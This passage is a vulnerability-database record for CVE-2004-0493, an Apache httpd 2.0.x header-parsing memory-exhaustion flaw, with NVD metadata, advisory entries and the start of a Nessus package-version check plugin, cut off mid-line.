ID CVE-2004-0493 Type cve Reporter NVD Modified 2017-10-10T21:29:26
Description
The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
{"id": "CVE-2004-0493", "bulletinFamily": "NVD", "title": "CVE-2004-0493", "description": "The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.", "published": "2004-08-06T00:00:00", "modified": "2017-10-10T21:29:26", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0493", "reporter": "NVD", "references": ["http://www.guninski.com/httpd1.html", "http://lists.grok.org.uk/pipermail/full-disclosure/2004-June/023133.html", "http://www.securityfocus.com/bid/10619", "http://www.apacheweek.com/features/security-20", "http://www.mandriva.com/security/advisories?name=MDKSA-2004:064", "http://marc.info/?l=bugtraq&m=108853066800184&w=2", "http://marc.info/?l=bugtraq&m=109181600614477&w=2", "http://security.gentoo.org/glsa/glsa-200407-03.xml", "http://www.trustix.org/errata/2004/0039/", "https://exchange.xforce.ibmcloud.com/vulnerabilities/16524", "http://www.redhat.com/support/errata/RHSA-2004-342.html"], "cvelist": ["CVE-2004-0493"], "type": "cve", "lastseen": "2017-10-11T11:05:56", "history": [{"bulletin": {"assessment": {"href": "http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:10605", "name": "oval:org.mitre.oval:def:10605", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "bulletinFamily": "NVD", "cpe": ["cpe:/o:trustix:secure_linux:2.0", "cpe:/a:ibm:http_server:2.0.42.1", "cpe:/h:avaya:s8700:r2.0.0", "cpe:/a:apache:http_server:2.0.49", "cpe:/o:trustix:secure_linux:2.1", "cpe:/a:ibm:http_server:2.0.42", "cpe:/h:avaya:s8500:r2.0.0", "cpe:/a:apache:http_server:2.0.48", "cpe:/a:ibm:http_server:2.0.42.2", "cpe:/a:ibm:http_server:2.0.47.1", "cpe:/o:gentoo:linux:1.4", "cpe:/h:avaya:converged_communications_server:2.0", "cpe:/o:trustix:secure_linux:1.5", "cpe:/a:ibm:http_server:2.0.47", "cpe:/h:avaya:s8300:r2.0.0", "cpe:/a:apache:http_server:2.0.47"], "cvelist": ["CVE-2004-0493"], "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "description": "The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.", "edition": 1, "hash": "6e17a75004d0e79364b44b0fb3a3c328349ed965ba009352e696a394ab8373af", "hashmap": [{"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "956b0cce3d9454921494ef535bcdf2a4", "key": "cvss"}, {"hash": "90e7b4b62f356e55c5cb3261944139e0", "key": "modified"}, {"hash": "0540f526d5b56f0baa2f693c67e2ffd4", "key": "published"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "cd28e7d7ae3c3f5d9b8d5bc924c1c255", "key": "description"}, {"hash": "2d9e712bec40b9cab21e8e87eeae67b4", "key": "scanner"}, {"hash": "622840d9a17ceeb7962d192c581476b2", "key": "assessment"}, {"hash": "4eedb7a16041634975eeef56ac10ad49", "key": "title"}, {"hash": "1483eedf312795ca8f331fe29c0849f1", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "9e4debc94a85436514d87d507dd0900e", "key": "references"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "0974b4a570ba67b612bc8c7978b0484b", "key": "href"}, {"hash": "bb2b18e62f74ca06ae309002a3bb49b1", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0493", "id": "CVE-2004-0493", "lastseen": "2016-09-03T04:23:38", "modified": "2010-08-21T00:20:38", "objectVersion": "1.2", "published": "2004-08-06T00:00:00", "references": ["http://www.guninski.com/httpd1.html", "http://lists.grok.org.uk/pipermail/full-disclosure/2004-June/023133.html", "http://www.securityfocus.com/bid/10619", "http://marc.theaimsgroup.com/?l=bugtraq&m=108853066800184&w=2", "http://www.apacheweek.com/features/security-20", "http://xforce.iss.net/xforce/xfdb/16524", "http://www.mandriva.com/security/advisories?name=MDKSA-2004:064", "http://security.gentoo.org/glsa/glsa-200407-03.xml", "http://marc.theaimsgroup.com/?l=bugtraq&m=109181600614477&w=2", "http://www.trustix.org/errata/2004/0039/", "http://www.redhat.com/support/errata/RHSA-2004-342.html"], "reporter": "NVD", "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10605", "name": "oval:org.mitre.oval:def:10605", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}], "title": "CVE-2004-0493", "type": "cve", "viewCount": 1}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T04:23:38"}, {"bulletin": {"assessment": {"href": "http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:10605", "name": "oval:org.mitre.oval:def:10605", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "bulletinFamily": "NVD", "cpe": ["cpe:/o:trustix:secure_linux:2.0", "cpe:/a:ibm:http_server:2.0.42.1", "cpe:/h:avaya:s8700:r2.0.0", "cpe:/a:apache:http_server:2.0.49", "cpe:/o:trustix:secure_linux:2.1", "cpe:/a:ibm:http_server:2.0.42", "cpe:/h:avaya:s8500:r2.0.0", "cpe:/a:apache:http_server:2.0.48", "cpe:/a:ibm:http_server:2.0.42.2", "cpe:/a:ibm:http_server:2.0.47.1", "cpe:/o:gentoo:linux:1.4", "cpe:/h:avaya:converged_communications_server:2.0", "cpe:/o:trustix:secure_linux:1.5", "cpe:/a:ibm:http_server:2.0.47", "cpe:/h:avaya:s8300:r2.0.0", "cpe:/a:apache:http_server:2.0.47"], "cvelist": ["CVE-2004-0493"], "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "description": "The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.", "edition": 3, "enchantments": {}, "hash": "482e1c1a037d4243a90431cfe545a745cf00cfe4f7483dc99d44c1b9d6f6b12e", "hashmap": [{"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "956b0cce3d9454921494ef535bcdf2a4", "key": "cvss"}, {"hash": "0540f526d5b56f0baa2f693c67e2ffd4", "key": "published"}, {"hash": "6277aaef99c297b5130d9367be6629b1", "key": "modified"}, {"hash": "cd28e7d7ae3c3f5d9b8d5bc924c1c255", "key": "description"}, {"hash": "2d9e712bec40b9cab21e8e87eeae67b4", "key": "scanner"}, {"hash": "622840d9a17ceeb7962d192c581476b2", "key": "assessment"}, {"hash": "4eedb7a16041634975eeef56ac10ad49", "key": "title"}, {"hash": "1483eedf312795ca8f331fe29c0849f1", "key": "cvelist"}, {"hash": "3b6b8afbf581482ea55875e912df3561", "key": "references"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "0974b4a570ba67b612bc8c7978b0484b", "key": "href"}, {"hash": "bb2b18e62f74ca06ae309002a3bb49b1", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0493", "id": "CVE-2004-0493", "lastseen": "2017-07-11T11:14:26", "modified": "2017-07-10T21:30:12", "objectVersion": "1.3", "published": "2004-08-06T00:00:00", "references": ["http://www.guninski.com/httpd1.html", "http://lists.grok.org.uk/pipermail/full-disclosure/2004-June/023133.html", "http://www.securityfocus.com/bid/10619", "http://www.apacheweek.com/features/security-20", "http://www.mandriva.com/security/advisories?name=MDKSA-2004:064", "http://marc.info/?l=bugtraq&m=108853066800184&w=2", "http://marc.info/?l=bugtraq&m=109181600614477&w=2", "http://security.gentoo.org/glsa/glsa-200407-03.xml", "http://www.trustix.org/errata/2004/0039/", "https://exchange.xforce.ibmcloud.com/vulnerabilities/16524", "http://www.redhat.com/support/errata/RHSA-2004-342.html"], "reporter": "NVD", "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10605", "name": "oval:org.mitre.oval:def:10605", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}], "title": "CVE-2004-0493", "type": "cve", "viewCount": 3}, "differentElements": ["assessment", "modified"], "edition": 3, "lastseen": "2017-07-11T11:14:26"}, {"bulletin": {"assessment": {"href": "http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:10605", "name": "oval:org.mitre.oval:def:10605", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "bulletinFamily": "NVD", "cpe": ["cpe:/o:trustix:secure_linux:2.0", "cpe:/a:ibm:http_server:2.0.42.1", "cpe:/h:avaya:s8700:r2.0.0", "cpe:/a:apache:http_server:2.0.49", "cpe:/o:trustix:secure_linux:2.1", "cpe:/a:ibm:http_server:2.0.42", "cpe:/h:avaya:s8500:r2.0.0", "cpe:/a:apache:http_server:2.0.48", "cpe:/a:ibm:http_server:2.0.42.2", "cpe:/a:ibm:http_server:2.0.47.1", "cpe:/o:gentoo:linux:1.4", "cpe:/h:avaya:converged_communications_server:2.0", "cpe:/o:trustix:secure_linux:1.5", "cpe:/a:ibm:http_server:2.0.47", "cpe:/h:avaya:s8300:r2.0.0", "cpe:/a:apache:http_server:2.0.47"], "cvelist": ["CVE-2004-0493"], "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "description": "The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.", "edition": 2, "enchantments": {}, "hash": "7c3e0e21df111547cef4ea469c9b478725473bc9eb259c0b2ee8a514e3c51e33", "hashmap": [{"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "956b0cce3d9454921494ef535bcdf2a4", "key": "cvss"}, {"hash": "0540f526d5b56f0baa2f693c67e2ffd4", "key": "published"}, {"hash": "cd28e7d7ae3c3f5d9b8d5bc924c1c255", "key": "description"}, {"hash": "2d9e712bec40b9cab21e8e87eeae67b4", "key": "scanner"}, {"hash": "622840d9a17ceeb7962d192c581476b2", "key": "assessment"}, {"hash": "4eedb7a16041634975eeef56ac10ad49", "key": "title"}, {"hash": "57ab6b98985ca2a89a2dd9d8fce6f137", "key": "modified"}, {"hash": "1483eedf312795ca8f331fe29c0849f1", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "0974b4a570ba67b612bc8c7978b0484b", "key": "href"}, {"hash": "9a58918c4186a97b239eef687d61fbfa", "key": "references"}, {"hash": "bb2b18e62f74ca06ae309002a3bb49b1", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0493", "id": "CVE-2004-0493", "lastseen": "2017-04-18T15:50:17", "modified": "2016-10-17T22:45:44", "objectVersion": "1.2", "published": "2004-08-06T00:00:00", "references": ["http://www.guninski.com/httpd1.html", "http://lists.grok.org.uk/pipermail/full-disclosure/2004-June/023133.html", "http://www.securityfocus.com/bid/10619", "http://www.apacheweek.com/features/security-20", "http://xforce.iss.net/xforce/xfdb/16524", "http://www.mandriva.com/security/advisories?name=MDKSA-2004:064", "http://marc.info/?l=bugtraq&m=108853066800184&w=2", "http://marc.info/?l=bugtraq&m=109181600614477&w=2", "http://security.gentoo.org/glsa/glsa-200407-03.xml", "http://www.trustix.org/errata/2004/0039/", "http://www.redhat.com/support/errata/RHSA-2004-342.html"], "reporter": "NVD", "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10605", "name": "oval:org.mitre.oval:def:10605", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}], "title": "CVE-2004-0493", "type": "cve", "viewCount": 2}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-04-18T15:50:17"}], "edition": 4, "hashmap": [{"key": "assessment", "hash": "593bd42eb5a4dac7ad4a035d78307be3"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "bb2b18e62f74ca06ae309002a3bb49b1"}, {"key": "cvelist", "hash": "1483eedf312795ca8f331fe29c0849f1"}, {"key": "cvss", "hash": "956b0cce3d9454921494ef535bcdf2a4"}, {"key": "description", "hash": "cd28e7d7ae3c3f5d9b8d5bc924c1c255"}, {"key": "href", "hash": "0974b4a570ba67b612bc8c7978b0484b"}, {"key": "modified", "hash": "c61e6bb565b4c96b57b332a7218154d8"}, {"key": "published", "hash": "0540f526d5b56f0baa2f693c67e2ffd4"}, {"key": "references", "hash": "3b6b8afbf581482ea55875e912df3561"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "2d9e712bec40b9cab21e8e87eeae67b4"}, {"key": "title", "hash": "4eedb7a16041634975eeef56ac10ad49"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "1a02efc72a7075b6cabf5fd5adab3f15ab83c59d9c39b39ac1773fee14ba87e1", "viewCount": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-10-11T11:05:56"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/o:trustix:secure_linux:2.0", "cpe:/a:ibm:http_server:2.0.42.1", "cpe:/h:avaya:s8700:r2.0.0", "cpe:/a:apache:http_server:2.0.49", "cpe:/o:trustix:secure_linux:2.1", "cpe:/a:ibm:http_server:2.0.42", "cpe:/h:avaya:s8500:r2.0.0", "cpe:/a:apache:http_server:2.0.48", "cpe:/a:ibm:http_server:2.0.42.2", "cpe:/a:ibm:http_server:2.0.47.1", "cpe:/o:gentoo:linux:1.4", "cpe:/h:avaya:converged_communications_server:2.0", "cpe:/o:trustix:secure_linux:1.5", "cpe:/a:ibm:http_server:2.0.47", "cpe:/h:avaya:s8300:r2.0.0", "cpe:/a:apache:http_server:2.0.47"], "assessment": {"href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10605", "name": "oval:org.mitre.oval:def:10605", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10605", "name": "oval:org.mitre.oval:def:10605", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}]}
{"httpd": [{"lastseen": "2016-09-26T21:39:38", "references": [], "description": "\n\nA memory leak in parsing of HTTP headers which can be triggered\nremotely may allow a denial of service attack due to excessive memory\nconsumption.\n\n", "edition": 1, "reporter": "Apache Team Foundation", "published": "2004-06-13T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "httpd", "title": "Apache Httpd < 2.0.50: Header parsing memory leak", "bulletinFamily": "software", "affectedSoftware": [{"name": "Apache httpd", "version": "2.0.39", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.36", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.37", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.48", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.42", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.49", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.35", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.43", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.44", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.40", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.47", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.45", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.46", "operator": "eq"}], "cvelist": ["CVE-2004-0493"], "modified": "2004-07-01T00:00:00", "id": "HTTPD:3C611CFBC257124CABFC3F9D43E0FB40", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:35:48", "references": [], "description": "\n\nA memory leak in parsing of HTTP headers which can be triggered\nremotely may allow a denial of service attack due to excessive memory\nconsumption.\n\n", "edition": 3, "reporter": "Apache Team Foundation", "published": "2004-06-13T00:00:00", "title": "Apache Httpd < None: Header parsing memory leak", "type": "httpd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Apache httpd", "version": "2.0.39", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.36", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.37", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.48", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.42", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.49", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.35", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.43", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.44", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.40", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.47", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.45", "operator": "eq"}, {"name": "Apache httpd", "version": "2.0.46", "operator": "eq"}], "cvelist": ["CVE-2004-0493"], "modified": "2004-07-01T00:00:00", "id": "HTTPD:716DC8755E794DA060B129F86E2DA830", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-02T00:02:28", "references": ["http://www.guninski.com/httpd1.html"], "pluginID": "14163", "description": "A Denial of Service (Dos) condition was discovered in Apache 2.x by George Guninski. Exploiting this can lead to httpd consuming an arbitrary amount of memory. On 64bit systems with more than 4GB of virtual memory, this may also lead to a heap-based overflow.\n\nThe updated packages contain a patch from the ASF to correct the problem.\n\nIt is recommended that you stop Apache prior to updating and then restart it again once the update is complete ('service httpd stop' and 'service httpd start' respectively).", "edition": 5, "reporter": "Tenable", "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : apache2 (MDKSA-2004:064)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:apache2-mod_dav", "p-cpe:/a:mandriva:linux:apache2-mod_ssl", "p-cpe:/a:mandriva:linux:apache2-mod_ldap", "p-cpe:/a:mandriva:linux:apache2", "p-cpe:/a:mandriva:linux:lib64apr0", "cpe:/o:mandrakesoft:mandrake_linux:9.1", "cpe:/o:mandrakesoft:mandrake_linux:10.0", "p-cpe:/a:mandriva:linux:apache2-mod_disk_cache", "p-cpe:/a:mandriva:linux:apache2-common", "p-cpe:/a:mandriva:linux:apache2-devel", "p-cpe:/a:mandriva:linux:apache2-modules", "cpe:/o:mandrakesoft:mandrake_linux:9.2", "p-cpe:/a:mandriva:linux:apache2-mod_mem_cache", "p-cpe:/a:mandriva:linux:apache2-manual", "p-cpe:/a:mandriva:linux:apache2-mod_file_cache", "p-cpe:/a:mandriva:linux:apache2-mod_proxy", "p-cpe:/a:mandriva:linux:apache2-mod_cache", "p-cpe:/a:mandriva:linux:libapr0", "p-cpe:/a:mandriva:linux:apache2-mod_deflate", "p-cpe:/a:mandriva:linux:apache2-source"], "id": "MANDRAKE_MDKSA-2004-064.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=14163", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2004:064. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14163);\n script_version (\"1.17\");\n script_cvs_date(\"Date: 2018/07/19 20:59:13\");\n\n script_cve_id(\"CVE-2004-0493\");\n script_xref(name:\"MDKSA\", value:\"2004:064\");\n\n script_name(english:\"Mandrake Linux Security Advisory : apache2 (MDKSA-2004:064)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A Denial of Service (Dos) condition was discovered in Apache 2.x by\nGeorge Guninski. Exploiting this can lead to httpd consuming an\narbitrary amount of memory. On 64bit systems with more than 4GB of\nvirtual memory, this may also lead to a heap-based overflow.\n\nThe updated packages contain a patch from the ASF to correct the\nproblem.\n\nIt is recommended that you stop Apache prior to updating and then\nrestart it again once the update is complete ('service httpd stop' and\n'service httpd start' respectively).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.guninski.com/httpd1.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_dav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_disk_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_file_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_mem_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache2-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64apr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libapr0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-common-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-devel-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-manual-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_cache-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_dav-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_deflate-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_disk_cache-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_file_cache-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_ldap-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_mem_cache-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_proxy-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-mod_ssl-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-modules-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache2-source-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"amd64\", reference:\"lib64apr0-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libapr0-2.0.48-6.3.100mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-common-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-devel-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-manual-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-mod_dav-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-mod_ldap-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-mod_ssl-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-modules-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache2-source-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libapr0-2.0.47-1.9.91mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache2-common-2.0.47-6.6.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", 